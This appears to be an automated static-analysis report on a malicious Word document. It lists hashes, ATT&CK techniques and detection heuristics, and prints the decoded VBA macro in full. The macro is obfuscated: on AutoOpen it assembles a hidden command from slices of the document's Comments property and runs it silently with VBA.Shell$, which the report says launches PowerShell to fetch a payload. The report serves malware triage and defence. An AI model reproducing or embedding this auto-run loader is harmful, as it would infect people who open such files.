Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f62eeb0eff486480…

MALICIOUS

Office (OLE)

79.5 KB Created: 2017-10-10 22:26:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 7816f2992b448e40458669f1ec75e0c9 SHA-1: 00f5cee0af496ac235843bcac75c4989e891f77f SHA-256: f62eeb0eff486480249ac5768d77419a5a3099bdd712a168a37d857bc05839f8
212 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and triggers the execution of a Shell() command, which in turn references PowerShell. This indicates the document is designed to download and execute a secondary payload. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further supports this analysis.

Heuristics 8

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
    VBA.Shell$ aBYsbtnzr, 0
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub AutoOpen()
    PinjEEHiY
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8542 bytes
SHA-256: a9d608a226b560f4fcd0829005947a79efdced6f688c2a884428e875235c0f85
Detection
ClamAV: No threats found
Obfuscation or payload: likely
53 of 85 identifiers look randomly generated (e.g. 'jjHjqGFFpkh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub PinjEEHiY()
jjHjqGFFpkh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7400, 53)
RDcwVJIQWYI = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 8122), 56)
GUzrRbJd = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12952), 58)
XBOoVJ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8757, 88)
MhtCsoCcsz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10381), 143)
HzYQAl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7748, 187)
FzHVnHAmvd = jjHjqGFFpkh + RDcwVJIQWYI + GUzrRbJd + XBOoVJ + MhtCsoCcsz + HzYQAl
LooiMwhF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2105, 91)
wojDWSGq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8848, 127)
CiFVWKYK = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 8224), 7)
viwKu = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 7575), 35)
XiRrkhTIh = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 216), 122)
iUpmE = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 5669), 104)
ciTLBZXl = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4461), 73)
PrZILnjLL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12249, 108)
AmMpGUf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4304), 61)
IiWmRc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 17586, 112)
csTzMl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8680, 41)
iuShGatnFb = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16282), 97)
WvEskH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10671, 195)
UmribYiST = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10556), 66)
ASzcaNTGil = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 1809), 134)
pjDohnbOF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11521, 181)
VrDjFi = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 10917), 199)
UlnuoXTi = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2533), 37)
ArwlFBB = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1488, 88)
BfsEipKdk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15109), 53)
OYqLPvCm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7183, 131)
OJwzFUJ = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 2707), 151)
ChhwqvbjFF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8434, 184)
jHBDcBnWKwP = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 14813), 180)
mVvHdUA = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6159), 83)
UvjZzQnOwjk = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6992), 128)
BvudTWNbD = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4686), 50)
fEZjZcli = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 13631), 192)
nFWCCXjwC = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16714, 187)
vHUAMAAd = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11289), 129)
QdItvrGo = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 6847), 107)
GXuOpYaRzif = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 6557), 31)
AjwEfMckA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15839), 78)
WbOIHf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 13557), 42)
hoRYMF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13328, 25)
ZjiDrOuHJw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1001, 153)
csKGFjrN = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14039, 51)
KTBXTuj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3053, 106)
wVXCBVOWH = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 18177), 27)
zItBf = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 4276), 177)
KSjOziHY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13127, 93)
vazUa = FzHVnHAmvd + LooiMwhF + wojDWSGq + CiFVWKYK + viwKu + XiRrkhTIh + iUpmE + ciTLBZXl + PrZILnjLL + AmMpGUf + IiWmRc + csTzMl + iuShGatnFb + WvEskH + UmribYiST + ASzcaNTGil + pjDohnbOF + VrDjFi + UlnuoXTi + ArwlFBB + BfsEipKdk + OYqLPvCm + OJwzFUJ + ChhwqvbjFF + jHBDcBnWKwP + mVvHdUA + UvjZzQnOwjk + BvudTWNbD + fEZjZcli + nFWCCXjwC + vHUAMAAd + QdItvrGo + GXuOpYaRzif + AjwEfMckA + WbOIHf + hoRYMF + ZjiDrOuHJw + csKGFjrN + KTBXTuj + wVXCBVOWH + zItBf + KSjOziHY
QapXlAbQi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10124, 56)
LChLu = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9937, 36)
iGWwVRHT = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 10052), 15)
izwTfFH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 18212, 47)
FZMbw = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 5959), 77)
ziDNPEnAw = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 15403), 190)
SFXPRv = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12513, 102)
lBljzaspbA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 12663), 125)
azmUYQrBZ = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 11795), 184)
WNzoMhpHRRK = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 673), 174)
MCFmWPLzf = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4696, 103)
STDqADIMb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5879, 57)
IWLFi = vazUa + QapXlAbQi + LChLu + iGWwVRHT + izwTfFH + FZMbw + ziDNPEnAw + SFXPRv + lBljzaspbA + azmUYQrBZ + WNzoMhpHRRK + MCFmWPLzf + STDqADIMb
qbPWtdwHOIz = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 15774), 33)
zkFAqHYGf = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 9183), 40)
jOvUpwi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 16161, 25)
EXrkPmio = Right(Left(ActiveDocument.BuiltInDocumentProperties("Comments"), 12955), 2)
KlFEoDZs = IWLFi + qbPWtdwHOIz + zkFAqHYGf + jOvUpwi + EXrkPmio
pihdSPdwKZZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9579, 5)
lDckUuT = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 4010), 4)
okjjupwCM = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 16128), 4)
wKTVbW = KlFEoDZs + pihdSPdwKZZ + lDckUuT + okjjupwCM
skSkapXRiA = Left(Right(ActiveDocument.BuiltInDocumentProperties("Comments"), Len(ActiveDocument.BuiltInDocumentProperties("Comments")) - 17115), 1)
zuiVozHNME = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 614, 1)
aBYsbtnzr = wKTVbW + skSkapXRiA + zuiVozHNME
VBA.Shell$ aBYsbtnzr, 0
End Sub
Sub AutoOpen()
PinjEEHiY
End Sub